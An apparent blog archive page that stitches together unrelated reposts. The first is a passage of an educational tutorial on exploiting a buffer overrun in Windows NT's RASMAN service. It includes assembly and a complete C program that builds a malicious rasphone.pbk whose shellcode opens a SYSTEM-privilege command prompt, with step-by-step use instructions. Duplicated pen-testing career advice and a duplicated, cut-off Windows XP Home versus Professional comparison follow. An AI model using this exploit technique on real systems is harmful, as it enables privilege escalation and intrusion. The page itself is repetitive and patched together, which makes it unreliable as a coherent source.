Here we have definitive proof that the fathers of modern computing were indeed closet sadists or had shares in makers of paracetamol - occasionally they throw in gems like this to make that headache that bit more acute. When we say the stack increases in size the address held in the ESP decreases. Conversly when the stack size decreases the address held in the ESP increases. Reaching for the Asprin yet?
Our second stack related register is known as the EBP or the Base Pointer. The EBP holds then memory address of the bottom of the stack - more accurately it points to a base point in the stack that we can use a reference point within a given programatic task. The EBP must have meaning to a given task and to facilitate this before the task's real business is started a setup procedure known as the "procedure prologue" is first completed. What this does is, firstly, save the current EBP by PUSHing it onto the stack. This is so that the processor and program will know where to pick up from after the currently executing task has completed. The ESP is then copied into the EBP thus creating a new Base Pointer that the currently executing task can use as a reference point irrespective of how the ESP changes during the task's execution. Continuing with this let's say an 11 character string was placed onto the stack - our EBP remains the same but the ESP has been pushed out by 12 bytes. Then say an address was PUSHed onto the stack - our ESP is pushed out by another 4 bytes, though our EBP still remains the same. Now let's say we needed to reference the 11 byte string - we can do this by using our EBP: we know the first byte of our string (the pointer to the string) is twelve bytes away from the EBP so we can reference this string's pointer by saying,"the address found at EBP minus 12". (Remember the stack goes from a higher address to a lower address)
RASMAN and buffer overruns.
Finding the buffer overrun
The first thing you need to do to be able to exploit a buffer overrun is to a) know about an existing one or b) find your own one. In the case of RASMAN, the overrun was found by looking at the RAS functions and the structures the used. Notice that some of the functions, such as RasGetDialParams ( ), fill structures that contain characters arrays, much like char name[31] character array in the C code above. By playing around with rasphone.pbk file, the RAS Phone Book, where dialing details, such as the phone number to be dialed, are stored, you can root out these overruns. Make a phone book entry called "Internet", which dials into your ISP, dial it, and downloaded your mails. This is important as this adds to the Registry an entry for the domain name of your mail server as an Autodial location. That is, if you try to contact your mail server, from that point on, without being dialed into the Internet, the Connection manager would kick in and automatically dial for you. RASMAN is the process that handles this functionality. Once you have done this change the telephone number to a long string of As and then attempted to connect to your mail server, say, by opening Outlook Express. This causes RASMAN to read in from rasphone.pbk the telephone number to dial to be able to get to your mail server. But instead of the real telephone number the long string of As is read instead and fills a character array in the RAS_DIAL_PARAMS structure which overflows causing an Access Violation - at address 0x41414141. We've found a buffer overrun and, more exciting, overwritten the EIP.
Finding where the EIP is overwritten
By experimenting with the length of the "telephone number" we find that we overwrite the EIP with bytes 296,297,298 and 299 of our string. (You'll find that, if you are actually following this, you'll need to reboot the system after the overflow to be able to restart the service, and you'll have to end tasks such as AthenaWindow and msmin.exe.) Once we have found where we overwrite the EIP it is time to get out the debugger - the debugging capabilities of Visual C++ are very good. Attach to the RASMAN process and then get it to dial - or attempt to at least. Wait for the access violation.
Analyze what's going on.
Once the access violation has occured we need to look at the stack and the state of the CPU's registers. From this we can see that we also overwrite the EBP, which will come in handy later on and that the address of the first A of our "telephone number" is 0x015DF105. By getting RASMAN to access violate a number of times we find that the first A is always written to this address. This is the address we're going to set the EIP to so that the processor will look at that address for the next instrution to execute. We'll stuff the "telephone number" full of our own opcodes that will get RASMAN to do what we want it to do - our arbitary code. We then need to ask, "What do we want it to do?".
Where do you want to go today? - What do you want to acheive?
The best thing to do, as we need to be at the console to get this to work, is get RASMAN to open up a Command Prompt. From here we can run any program we want with system privileges. The easiest way to get a program to run a Command Prompt, or any other program for that matter is to use the system ( ) function. When the system ( ) function is called it looks at the value of the ComSpec environment variable, normally "c:\winnt\system32\cmd.exe" on Windows NT and executes that with a "/C" switch. The function passes cmd.exe a command to run and the "/C" switch tells cmd.exe to exit after the command has finished executing. If we pass "cmd.exe" as the command - system("cmd.exe"); - this will cause the system function to open up cmd.exe with the "/C" switch and execute cmd.exe - so we are running two instances of the command interpreter - however the second one won't exit until we tell it to ( and nor will the first until the second one has exited.)
Rather than the placing the opcodes that actually form the system ( ) function in our exploit string it would be easier to simply call it. When you call a function you tell the program to go to a certain DLL that contains the code for the function you are calling. The use of DLLs means that programs can be smaller in size - rather than each program containing the necessary code for each function used they can call a shared DLL that does contain the code. DLLs are said to export functions - that is the DLL provides an address where a function can be found. The DLL also has a base address so the system knows where to find that DLL. When a DLL is loaded into a process' address space it will always be found at that base address and the functions it exports can then be found at an entry point within the base. The system ( ) function is exported msvcrt.dll (the Microsoft Visual C++ Runtime library) which has base address of 0x78000000 and system ( ) entry point can be found at 000208C3 (in version 5.00.7303 of msvcrt.dll anyway) meaning that the address of the system ( ) function is 0x780208C3. Hopefully msvcrt.dll will already be loaded into RASMAN's address space - if it isn't we'll need to use LoadLibrary ( ) and GetProcAddress ( ). Fortunately RASMAN does use msvcrt.dll and so it is already in the process address space. This makes the job of exploiting the buffer overrun very easy indeed - we'll simply build a stack with our string of the command to run (cmd.exe) and and call it. What makes it even better is that the address 0x780208C3 has no nulls (00) in it. Nulls can really complicate issues.
To find out what the stack needs to look like when a normal program calls system("cmd.exe"); we need to write one that does and debug it. We'll need to get our arbitary code to build a duplicate image of the stack as it appears in our program just before system ( ) is called. Below is the source of our program. Compile and link it with kernel32.lib then run and debug it.
#include
#include
typedef void (*MYPROC)(LPTSTR);
int main()
{
HINSTANCE LibHandle;
MYPROC ProcAdd;
char dllbuf[11] = "msvcrt.dll";
char sysbuf[7] = "system";
char cmdbuf[8] = "cmd.exe";
LibHandle = LoadLibrary(dllbuf);
ProcAdd = (MYPROC) GetProcAddress(LibHandle, sysbuf);
(ProcAdd) (cmdbuf);
return 0;
}
On debugging and examining the stack prior to calling system ( ) [(ProcAdd)(cmdbuf); in the above code] we see that starting from the top of the stack we find the address of the "c" of cmd.exe, then the address of where the system ( ) function can be found, the null terminated cmd.exe string and a few other things that are too important. So to emulate this we need the null terminated "cmd.exe"string in the stack, then the address of the system function and then the address which points to our "cmd.exe" string. Below is a picture of what we need the stack to look like before calling system ( )
-------------------- ESP (Top of the Stack)
XX
--------------------
XX
--------------------
XX
--------------------
XX
--------------------
C3
--------------------
08
--------------------
02
--------------------
78
--------------------
63 c
--------------------
6D m
--------------------
64 d
--------------------
2E .
--------------------
65 e
--------------------
78 x
--------------------
65 e
--------------------
00
-------------------- EBP (Bottom of the stack)
where the top 4 XXs are the address of "c". We don't need to hardcode this address into our exploit string because we can use the EBP as a reference - remember it is the base pointer. Later on you'll see that we load the address where the first byte of our cmd.exe string can be found into a register using the EBP as a reference point.
Writing the Assembly.
This is what we need the stack to look like when we call system ( ). How do we get it there? We have to build it ourselves with our opcodes - we can't just put it in our exploit string because as you can see there are nulls in it and we can't have nulls. Because we have to build it this is where knowing at least a little assembly language comes in handy. The first thing we need to do is set the ESP to an address we can use for our stack. (Remember the ESP points to the top of the stack.) To do this we use:
mov esp, ebp
This moves the EBP into the ESP - rember we overwrite the EBP as well as the EIP which is really handy. We'll overwrite the EBP with an address we know we can write to - we will use 0x015DF124. Consequently the ESP, after we move the EBP into it, the top of the stack will be found at 0x015DF124.
We then want to push EBP onto the stack. This is our return address.
push ebp
This has the effect of pushing the ESP down 4 bytes and so ESP is now 0x015DF120. After this we then want to move the ESP into the EBP:
mov ebp,esp
This completes our own procedure prologue. With this done we can go about building the stack the way we want it to look
The next thing we need to do is get some nulls onto the stack. We need some nulls because we need to have our cmd.exe string terminated with a null. Even though the cmd.exe string isn't there yet it will be but we have to do things in reverse order. Before we can push some nulls onto the stack we need to make some. We do this by xoring a register with itself- we'll use the EDI register.
xor edi,edi
This will set the EDI to 00000000 and then we push it onto the stack using
push edi
This also has the added effect of pushing out our ESP to 0x015DF11C. But "cmd.exe" is 7 bytes long and we only have room for 4 bytes so far and don't forget we need a null tacked on the end of our string so we need to push the ESP out another 4 bytes to give us a total of 8 bytes of space between the ESP and the EBP. We could push the edi again, but for varitey we'll just sub the ESP by 4.
sub esp,04h
Our ESP is now 0x015DF118 and our EBP is 0x015DF120. Our next job is to get cmd.exe written to the stack. To do this we'll use the EBP as a reference point and move 63, the hex value for a small "c" into the address offset from the EBP minus 8.
mov byte ptr [ebp-08h],63h
We do the same for the "m", the "d", the ".", the first"e", the "x" and the final "e".
mov byte ptr [ebp-07h],6Dh mov byte ptr [ebp-06h],64h mov byte ptr [ebp-05h],2Eh mov byte ptr [ebp-04h],65h mov byte ptr [ebp-03h],78h mov byte ptr [ebp-02h],65h
Our stack now looks like this:
----------------------------------------------------- ESP
63 c
-----------------------------------------------------
6D m
-----------------------------------------------------
64 d
-----------------------------------------------------
2E .
-----------------------------------------------------
65 e
-----------------------------------------------------
78 x
-----------------------------------------------------
65 e
-----------------------------------------------------
00
----------------------------------------------------- EBP
All that we need to do now is put the address of system( ) onto the stack and the pointer to our cmd.exe string on top of that - once that is done we'll call the system ( ) function.
We know that the system( ) function is exported at address 0x780208C3 so we'll move this into a register and then push it onto the stack:
mov eax, 0x780208C3 push eax
We then want to put the address of the "c" of our "cmd.exe" string onto the stack. We know that the "c" can be found eight bytes away from our EBP so we'll load the address 8 bytes less than the EBP into a register:
lea eax,[ebp-08h]
The EAX register now holds the address where our cmd.exe string begins. We then want to push this onto the stack:
push eax
With this done our stack is built and we are ready to call system ( ) but we don't call it directly - again we use the indirection of using our EBP as a reference point and call address found at EBP minus 12 (or 0C in hex):
call dword ptr [ebp-0ch]
Here is all our code strung together.
mov esp,ebp
push ebp
mov ebp,esp
xor edi,edi
push edi
sub esp,04h
mov byte ptr [ebp-08h],63h
mov byte ptr [ebp-07h],6Dh
mov byte ptr [ebp-06h],64h
mov byte ptr [ebp-05h],2Eh
mov byte ptr [ebp-04h],65h
mov byte ptr [ebp-03h],78h
mov byte ptr [ebp-02h],65h
mov eax, 0x780208C3
push eax
lea eax,[ebp-08h]
push eax
call dword ptr [ebp-0ch]
The next thing to do is test this assembly to see if it works so we need to write a program that uses the __asm ( ) function. The __asm ( ) function takes Assembly language and incorporates it into a C program. As we are calling system ( ) which is exported by msvcrt.dll we'll need to load that- we use the LoadLibrary ( ) function to do this - otherwise when run our code would fail:
#include
#include
void main()
{
LoadLibrary("msvcrt.dll");
__asm {
mov esp,ebp
push ebp
mov ebp,esp
xor edi,edi
push edi
sub esp,04h
mov byte ptr [ebp-08h],63h
mov byte ptr [ebp-07h],6Dh
mov byte ptr [ebp-06h],64h
mov byte ptr [ebp-05h],2Eh
mov byte ptr [ebp-04h],65h
mov byte ptr [ebp-03h],78h
mov byte ptr [ebp-02h],65h
mov eax, 0x780208C3
push eax
lea eax,[ebp-08h]
push eax
call dword ptr [ebp-0ch]
}
}
compile and link with kernel32.lib. When run this should start a new instance of the Command Interperter, cmd.exe. There will be an access violation however when you exit that instance in the program though - we've messed around with the stack and haven't clean up after ourselves.
That's it then - that's our arbritary code and all we need to do now is put this into the rasphone.pbk file as our telephone number. Before we can do that though, we need to get the op-codes for the above assembly.
This is relatively easy - just debug the program you've just compiled and get the opcodes from there. You should get "8B E5" for "mov esp,ebp" and "55" for "push ebp" etc etc. Once we have all the opcodes we need to put these in our "telephone number". But we can't type the opcodes very easily in Notepad. The easiest thing to do is write another program that creates a rasphone.pbk file with the telephone number loaded with our arbitary code. Below is an example of such a program with comments:
/* This program produces a rasphone.pbk file that will cause and exploit a buffer overrun in */
/* RASMAN.EXE - it will drop the user into a Command Prompt started by the system. */
/* It operates by re-writing the EIP and pointing it back into our exploit string which calls */
/* the system() function exported at address 0x780208C3 by msvcrt.dll (ver 5.00.7303) on */
/* NT Server 4 (SP3 & 4). Look at the version of msvcrt.dll and change buffer[109] to buffer[112]*/
/* in this code to suit your version. msvcrt.dll is already loaded in memory - it is used by */
/* RASMAN.exe. Developed by David Litchfield (mnemonix@globalnet.co.uk ) */
#include
#include
int main (int argc, char *argv[])
{
FILE *fd;
int count=0;
char buffer[1024];
/* Make room for our stack so we are not overwriting anything we haven't */
/* already overwritten. Fill this space with nops */
while (count < 37)
{
buffer[count]=0x90;
count ++;
}
/* Our code starts at buffer[37] - we point our EIP to here @ address 0x015DF126 */
/* We build our own little stack here */
/* mov esp,ebp */
buffer[37]=0x8B;
buffer[38]=0xE5;
/*push ebp*/
buffer[39]=0x55;
/* mov ebp,esp */
buffer[40]=0x8B;
buffer[41]=0xEC;
/* This completes our negotiation */
/* We need some nulls */
/* xor edi,edi */
buffer[42]=0x33;
buffer[43]=0xFF;
/* Now we begin placing stuff on our stack */
/* Ignore this NOP */
buffer[44]=0x90;
/*push edi */
buffer[45]=0x57;
/* sub esp,4 */
buffer[46]=0x83;
buffer[47]=0xEC;
buffer[48]=0x04;
/* When the system() function is called you ask it to start a program or command */
/* eg system("dir c:\\"); would give you a directory listing of the c drive */
/* The system () function spawns whatever is defined as the COMSPEC environment */
/* variable - usually "c:\winnt\system32\cmd.exe" in NT with a "/c" parameter - in */
/* other words after running the command the cmd.exe process will exit. However, running */
/* system ("cmd.exe") will cause the cmd.exe launched by the system function to spawn */
/* another command prompt - one which won't go away on us. This is what we're going to do here*/
/* write c of cmd.exe to (EBP - 8) which happens to be the ESP */
/* mov byte ptr [ebp-08h],63h */
buffer[49]=0xC6;
buffer[50]=0x45;
buffer[51]=0xF8;
buffer[52]=0x63;
/* write the m to (EBP-7)*/
/* mov byte ptr [ebp-07h],6Dh */
buffer[53]=0xC6;
buffer[54]=0x45;
buffer[55]=0xF9;
buffer[56]=0x6D;
/* write the d to (EBP-6)*/
/* mov byte ptr [ebp-06h],64h */
buffer[57]=0xC6;
buffer[58]=0x45;
buffer[59]=0xFA;
buffer[60]=0x64;
/* write the . to (EBP-5)*/
/* mov byte ptr [ebp-05h],2Eh */
buffer[61]=0xC6;
buffer[62]=0x45;
buffer[63]=0xFB;
buffer[64]=0x2E;
/* write the first e to (EBP-4)*/
/* mov byte ptr [ebp-04h],65h */
buffer[65]=0xC6;
buffer[66]=0x45;
buffer[67]=0xFC;
buffer[68]=0x65;
/* write the x to (EBP-3)*/
/* mov byte ptr [ebp-03h],78h */
buffer[69]=0xC6;
buffer[70]=0x45;
buffer[71]=0xFD;
buffer[72]=0x78;
/*write the second e to (EBP-2)*/
/* mov byte ptr [ebp-02h],65h */
buffer[73]=0xC6;
buffer[74]=0x45;
buffer[75]=0xFE;
buffer[76]=0x65;
/* If the version of msvcrt.dll is 5.00.7303 system is exported at 0x780208C3 */
/* Use QuickView to get the entry point for system() if you have a different */
/* version of msvcrt.dll and change these bytes accordingly */
/* mov eax, 0x780208C3 */
buffer[77]=0xB8;
buffer[78]=0xC3;
buffer[79]=0x08;
buffer[80]=0x02;
buffer[81]=0x78;
/* Push this onto the stack */
/* push eax */
buffer[82]=0x50;
/* now we load the address of our pointer to the cmd.exe string into EAX */
/* lea eax,[ebp-08h]*/
buffer[83]=0x8D;
buffer[84]=0x45;
buffer[85]=0xF8;
/* and then push it onto the stack */
/*push eax*/
buffer[86]=0x50;
/* now we call our system () function - all going well a command prompt will */
/* be started, the parent process being rasman.exe */
/*call dword ptr [ebp-0Ch] */
buffer[87]=0xFF;
buffer[88]=0x55;
buffer[89]=0xF4;
/* fill to our EBP with nops */
count = 90;
while (count < 291)
{
buffer[count]=0x90;
count ++;
}
/* Re-write EBP */
buffer[291]=0x24;
buffer[292]=0xF1;
buffer[293]=0x5D;
buffer[294]=0x01;
/* Re-write EIP */
buffer[295]=0x26;
buffer[296]=0xF1;
buffer[297]=0x5D;
buffer[298]=0x01;
buffer[299]=0x00;
buffer[300]=0x00;
/* Print on the screen our exploit string */
printf("%s", buffer);
/* Open and create a file called rasphone.pbk */
fd = fopen("rasphone.pbk", "w");
if(fd == NULL)
{
printf("Operation failed\n");
return 0;
}
else
{
fprintf(fd,"[Internet]\n");
fprintf(fd,"Phone Number=");
fprintf(fd,"%s",buffer);
fprintf(fd,"\n");
}
return 0;
}
When compiled and run this program will create a rasphone.pbk file with one entry called Internet and a phone number loaded with our arbitary code. When RASMAN.EXE opens this file and it uses RasGetDialParams ( ) to get the relevant information and assigns it to a RAS_DIAL_PARAMS structure which contains the character arrays. As you'll have guessed we're overflowing the one that holds the telephone number.
Now to test it all.
Quite often when trying to exploit buffer overruns you don't get it right the first time - usually due to an oversight or something. The code in this document has been tested on NT Server 4 with SP 3, NT Server 4 with SP 4 and NT Workstation SP 3 all running on a Pentium processor and it works - that's not to say that it will run on your machine though. There could be a number of reasons why it might not, but that is up to you to find out. So any way, let's test it:
To be able to get this to work take the following steps:
1) Make a backup copy of your real rasphone.pbk file and then delete the original. The NTFS permissions on this file by default give everybody the Change permission so there shouldn't be a problem with this.
2) Run rasphone (click on Start -> Run -> type rasphone -> OK). You should get a message saying that the phone book is empty and click OK to create a new one.
3) Click OK and make a new entry calling it "Internet". Put in the relevant information needed to be able to dial into your ISP. Once the entry is complete dial it.
4) Once connected open Outlook Express and download your e-mails. The reason for doing this is because this will create a Registry entry for your mail server's domain name and associate it as an autodialable address. If Outlook Express' connection is dial up change it to a LAN connection - this'll be under the mail account's properties.
5) Hangup and close Outlook Express.
6) Copy the delete the new rasphone.pbk and replace it with your one made from the above code.
7) Open Outlook Express.
Because your not connected to the Internet RASMAN should automatically dial for you, read in from the Registry the autodail information then open rasphone.pbk, fill its buffers and overflow. Within about eight seconds or so a Command Prompt window will open. This Command Prompt has SYSTEM privileges.
That's it - we've exploited a buffer overrun and executed our arbitary code.
Acticle from : http://www.ngssoftware.com/papers/ntbufferoverflow.html
Wednesday, July 20, 2005
How to Be a Pen-Tester
Technology Updates
Read and learn about network protocols. Be able to quickly recognize things like.... a TCP session SYN, SYN ACK, ACK, - data - FIN, FIN ACK handshake.
Read about text-based network protocols, IE SMTP, POP3, TELNET, FTP, HTTP etc and be able to manage a session by hand without relying completely a script
Learn to look at the output of NMAP and know within 10 seconds what the purpose of each machine shown is. Learn which ports do what and what ports don't do anything. What ports are common and what ports are not. What ports are static and what ports are dynamic. Learn what ports are reserved and which aren't and what ports are superuser only and which ports are open season for any process.
Learn about firewalls and what brands are out there. Read about stateful packet inspection and absorb its usefulness and danger. Read about NAT and how it can impact security and accessability. Learn how the shape of the headers on a packet can determine many things ranging from the host OS to
the presence of a virus.
Learn about network topography and the difference between routing and switching and broadcasting. Learn about IP subnetting and the difference between public/private IP addresses. Learn about routers and how they work.. and WHY they work. And WHERE they work.
Read about the programming of the IP stack and how TCP/UDP on IP works in terms of windows and responses and learn how IP fits in with other network protocols and where TCP differs from UDP.
Learn how to code in C. Know what a buffer is and how it might overflow.
Be able to read complex C code (try the Linux kernel, last I looked at it, it was a spaghetti ball and ugly as hell, but beautiful at the same time)
Learn the difference between a virus and worm and the difference between a rootkit and a Trojan. And the difference between a cracker, hacker and a
script-kiddie. FYI, good pen-testers are BY DEFINITION, good hackers. Bad
pen-testers are almost always uhhh "white hat script-kiddies".
it could keep going... there's lots more.
but being a good pen-tester is basically akin to being a good cracker.
Being a good cracker is not like TV where someone click buttons for 45 seconds and WHAM, they broke into the IRS mainframe. It's about patience, knowledge, intuition, knowledge, experience, knowledge and most importantly, all of the above.
FYI, FOUR semesters of Graduate Level network infrastructure, network design and "information warfare" classes didn't come close to covering all of this material.
The pen-tester has to be close to the elite of the crackers or their test does nothing.
If all you do is run some tools and see that the tools can't do any damage, you're a script-kiddie, not a pen-tester.
Comment by Eric - Hagen
Read and learn about network protocols. Be able to quickly recognize things like.... a TCP session SYN, SYN ACK, ACK, - data - FIN, FIN ACK handshake.
Read about text-based network protocols, IE SMTP, POP3, TELNET, FTP, HTTP etc and be able to manage a session by hand without relying completely a script
Learn to look at the output of NMAP and know within 10 seconds what the purpose of each machine shown is. Learn which ports do what and what ports don't do anything. What ports are common and what ports are not. What ports are static and what ports are dynamic. Learn what ports are reserved and which aren't and what ports are superuser only and which ports are open season for any process.
Learn about firewalls and what brands are out there. Read about stateful packet inspection and absorb its usefulness and danger. Read about NAT and how it can impact security and accessability. Learn how the shape of the headers on a packet can determine many things ranging from the host OS to
the presence of a virus.
Learn about network topography and the difference between routing and switching and broadcasting. Learn about IP subnetting and the difference between public/private IP addresses. Learn about routers and how they work.. and WHY they work. And WHERE they work.
Read about the programming of the IP stack and how TCP/UDP on IP works in terms of windows and responses and learn how IP fits in with other network protocols and where TCP differs from UDP.
Learn how to code in C. Know what a buffer is and how it might overflow.
Be able to read complex C code (try the Linux kernel, last I looked at it, it was a spaghetti ball and ugly as hell, but beautiful at the same time)
Learn the difference between a virus and worm and the difference between a rootkit and a Trojan. And the difference between a cracker, hacker and a
script-kiddie. FYI, good pen-testers are BY DEFINITION, good hackers. Bad
pen-testers are almost always uhhh "white hat script-kiddies".
it could keep going... there's lots more.
but being a good pen-tester is basically akin to being a good cracker.
Being a good cracker is not like TV where someone click buttons for 45 seconds and WHAM, they broke into the IRS mainframe. It's about patience, knowledge, intuition, knowledge, experience, knowledge and most importantly, all of the above.
FYI, FOUR semesters of Graduate Level network infrastructure, network design and "information warfare" classes didn't come close to covering all of this material.
The pen-tester has to be close to the elite of the crackers or their test does nothing.
If all you do is run some tools and see that the tools can't do any damage, you're a script-kiddie, not a pen-tester.
Comment by Eric - Hagen
Tuesday, July 19, 2005
Difference between XP Home and Professional
Technology Updates
Windows XP Home Edition vs. Professional Edition: What's the difference?
Updated for the RTM release of Windows XP
With the inclusion of a new consumer-oriented version of Windows XP, there has been some confusion surrounding the differences between this product, Windows XP Home Edition, and its more upscale sibling, Windows XP Professional Edition. During a visit to Redmond in February where Windows XP Beta 2 and the new Whistler ("Luna") user interface was first unveiled, and in various meetings since then, I've been able to discuss this new Windows version with Microsoft executives and product managers. Beyond the obvious--Microsoft is targeting Home Edition at consumers and Professional at business users and power users--Group Vice President Jim Allchin said that the company was working hard to further differentiate the products. "With XP, the home version is what it is," Allchin said. "But where we're going, we've named them appropriately. In the future, this will make more sense. We will do more value add in Pro in the future."
"Divide them into managed and unmanaged environments," added John Frederiksen, the General Manager of the PC Experience Solution Group, noting that some smaller businesses would probably install Home Edition regardless of the target marketing. "Some small businesses have administrators, some don’t. Home Edition is not a managed OS. It's optimized for that consumer market. A lot of the OEM PCs marketed to consumers are bought by small businesses. In terms of naming, we wanted to continue the Professional name. For the consumer product, we tested the name Windows Me again, the year names, like Windows 2002, and a lot of other stuff. But Home Edition tested the best. The feedback said that Home Edition suggested it was customized for the home, which it was. We feel like the name reflects its purpose."
Windows XP Home Edition Overview
Windows XP Home Edition includes a number of enhancements over Windows 2000 Professional. These include:
Improved software (application) and hardware compatibility
Simplified security
Simplified log-on featuring new "welcome" screen
Fast user switching
A new user interface featuring context-sensitive, task-oriented Web views
Enhanced support for digital media (movies, pictures, music)
DirectX 8.1 multimedia libraries for gaming
Professional Edition: Superset of Home Edition
At its most basic level, XP Professional is a business- and power-user oriented superset of Home Edition. Because this orientation, it includes features that wouldn't be appropriate, or would be too complex, for the typical home user. The most obvious difference is security, which is vastly simplified in Home Edition. Each interactive user in XP Home is assumed to be a member of the Owners local group, which is the Windows XP equivalent of the Windows 2000 Administrator account: This means that anyone who logs on to a Home Edition machine has full control. Likewise, the Backup Operators, Power Users, and Replicator groups from Windows 2000/XP Pro are missing from Home Edition, and a new group, called Restricted Users, is added. Hidden administrative shares (C$, etc.) are also unavailable in Home Edition.
"Professional Edition is a strict superset of Home Edition," confirmed Chris Jones, Vice President of the Windows Client Group. "Everything you can do in Home Edition, you can do in Pro. So we do think there are home users who will buy Pro." Jones' distinction is a good one: With Windows XP, the Professional Edition is finally a superset of all the desktop clients that came before (Windows Me and Windows 2000 Professional) as well as of its new sibling. So when discussing the differences between the editions, it's best to simply describe those features in Pro that you can't get in Home Edition.
Pro features that aren't in Home Edition
The following features are not present in Windows XP Home Edition.
Power user
Remote Desktop - All versions of Windows XP--including Home Edition--support Remote Assistance, which is an assisted support technology that allows a help desk or system administrator to remotely connect to a client desktop for troubleshooting purposes. But Only Pro supports the new Remote Desktop feature, which is a single-session version of Terminal Services with two obvious uses: Mobile professionals who need to remotely access their corporate desktop, and remote administration of clients on a network. You can access a Windows XP Remote Desktop from any OS that supports a Terminal Services client (such as Windows 98 and, interestingly XP Home). XP Home can act as the client in a Remote Desktop session; only Pro can be the server.
Multi-processor support - Windows XP Pro supports up to two microprocessors, while Home Edition supports only one.
Automated System Recovery (ASR) - In a somewhat controversial move, Microsoft has removed the Backup utility from the default Windows XP Home Edition, though it is available as an optional installation if you can find it on the CD-ROM (hint: it's in the /valueadd folder). The reason for this the integration of Microsoft's new Automated System Recovery (ASR) tool into Backup. In Pro, ASR will help recover a system from a catastrophic error, such as one that renders the system unbootable. ASR-enabled backups are triggerable from XP Setup, allowing you to return your system to its previous state, even if the hard drive dies and has to be replaced. Unlike consumer-oriented features such as System Restore, ASR is not automatic: It must manually be enabled from within the Backup utility in Windows XP Pro. In any event, while there is a Backup utility available for Home Edition, you cannot use ASR, even though mentions of this feature still exist in the UI. Confusing? Yes. But it's better than no Backup at all, which was the original plan.
Dynamic Disk Support - Windows XP Professional (like its Windows 2000 equivalent) supports dynamic disks, but Home Edition does not (instead, HE supports only the standard Simple Disk type). Dynamic disks are not usable with any OS other than Windows 2000 or Windows XP Pro, and they cannot be used on portable computers. Likewise, Home Edition does not include the Logical Disk Manager.
Fax - Home Edition has no integrated fax functionality out of the box, though it is an option you can install from the XP Home CD.
Internet Information Services/Personal Web Server - Home Edition does not include the IIS Web server 5.1 software found in Pro.
Security
Encrypting File System - Windows XP Professional supports the Encrypting File System (EFS), which allows you encrypt individual files or folders for local security (EFS is not enabled over a network). EFS-protected files and folders allows users to protect sensitive documents from other users.
File-level access control - Any user with Administrator privileges can limit access to certain network resources, such as servers, directories, and files, using access control lists. Only Windows XP Professional supports file-level access control, mostly because this feature is typically implemented through Group Policy Objects, which are also not available in Home Edition.
"C2" certification - Microsoft will attempt to have Windows XP Professional certified with the "C2" security designation, a largely irrelevant status, but one which will not be afforded to Home Edition.
Management
Domain membership - Home Edition cannot be used to logon to an Active Directory domain. For obvious reasons, the Domain Wizard is also missing in Home Edition.
Group Policy - Since Home Edition cannot be used to logon to an Active Directory domain, Group Policy--whereby applications, network resources, and operating systems are administered for domain users--is not supported either.
IntelliMirror - Microsoft lumps a wide range of semi-related change and configuration management technologies under the IntelliMirror umbrella, and none of these features are supported in the consumer oriented Home Edition. IntelliMirror capabilities include user data management; centrally-managed software installation, repair, updating, and removal; user settings management; and Remote Installation Services (RIS), which allows administrators to remotely install the OS on client systems.
Roaming profiles - This feature allows users to logon to any computer in an Active Directory network and automatically receive their customized settings. It is not available in Home Edition, which cannot logon to an Active Directory domain.
Corporate deployment
Multi-language support - Only Windows XP Professional will ship in a Multi-Language version or support multiple languages in a single install.
Sysprep support - Windows XP Pro will support the System Preparation (Sysprep) utility, while Home Edition will not.
RIS support - See the IntelliMirror heading in the previous section; Home Edition does not support RIS deployments.
64-bit Edition
Microsoft is shipping a 64-bit version of Windows XP for Intel Itanium systems that mirrors the Professional Edition feature-set.
Networking features
The following networking features are not included in Home Edition:
The user interface for IPSecurity (IPSec)
SNMP
Simple TCP/IP services
SAP Agent
Client Service for NetWare
Network Monitor
Multiple Roaming feature
User interface features
Windows XP Home Edition has some different default settings that affect the user interface. For example, Guest logon is on by default in Home, but off in Pro. The Address bar in Explorer windows is on in Pro by default, but off in Home. During the beta period, Microsoft had intended to use a business-oriented shell theme ("Professional") by default in Pro and the "Luna" consumer theme in Home Edition. But feedback from corporate users suggested that everyone liked the consumer-oriented Luna theme better, and development of the Professional theme was cancelled. Other user interface features that are present in Pro but not Home include:
Client-side caching
Administrative Tools option on the Start menu (a subset of the Admin tools are still present in Home, however).
It's also worth mentioning that Home Edition will support upgrades from Windows 98, 98 SE, and Millennium Edition (Me), but not from Windows 95, NT 4.0 Workstation, or Windows 2000 Professional. You can upgrade from Windows 98, 98 SE, Millennium Edition (Me), Windows NT 4.0 Workstation, or Windows 2000 Professional to Windows XP Professional. See my article on What to Expect from Windows XP for more information.
Deciding which edition to buy is simple: Peruse the above list and decide whether you can live without any of these features. If you can't, then you're going to want to get Professional. Otherwise, save $100 and get Home Edition. Note that Microsoft is offering a less-expensive Professional "Step-Up" upgrade for Home users that wish to move to XP Pro.
Extract from http://www.winsupersite.com/showcase/windowsxp_home_pro.asp
--Paul Thurrott
February 8, 2001
Updated February 20, 2001, June 15, 2001, August 24, 2001, September 4-5, 2001, November 26, 2001
Windows XP Home Edition vs. Professional Edition: What's the difference?
Updated for the RTM release of Windows XP
With the inclusion of a new consumer-oriented version of Windows XP, there has been some confusion surrounding the differences between this product, Windows XP Home Edition, and its more upscale sibling, Windows XP Professional Edition. During a visit to Redmond in February where Windows XP Beta 2 and the new Whistler ("Luna") user interface was first unveiled, and in various meetings since then, I've been able to discuss this new Windows version with Microsoft executives and product managers. Beyond the obvious--Microsoft is targeting Home Edition at consumers and Professional at business users and power users--Group Vice President Jim Allchin said that the company was working hard to further differentiate the products. "With XP, the home version is what it is," Allchin said. "But where we're going, we've named them appropriately. In the future, this will make more sense. We will do more value add in Pro in the future."
"Divide them into managed and unmanaged environments," added John Frederiksen, the General Manager of the PC Experience Solution Group, noting that some smaller businesses would probably install Home Edition regardless of the target marketing. "Some small businesses have administrators, some don’t. Home Edition is not a managed OS. It's optimized for that consumer market. A lot of the OEM PCs marketed to consumers are bought by small businesses. In terms of naming, we wanted to continue the Professional name. For the consumer product, we tested the name Windows Me again, the year names, like Windows 2002, and a lot of other stuff. But Home Edition tested the best. The feedback said that Home Edition suggested it was customized for the home, which it was. We feel like the name reflects its purpose."
Windows XP Home Edition Overview
Windows XP Home Edition includes a number of enhancements over Windows 2000 Professional. These include:
Improved software (application) and hardware compatibility
Simplified security
Simplified log-on featuring new "welcome" screen
Fast user switching
A new user interface featuring context-sensitive, task-oriented Web views
Enhanced support for digital media (movies, pictures, music)
DirectX 8.1 multimedia libraries for gaming
Professional Edition: Superset of Home Edition
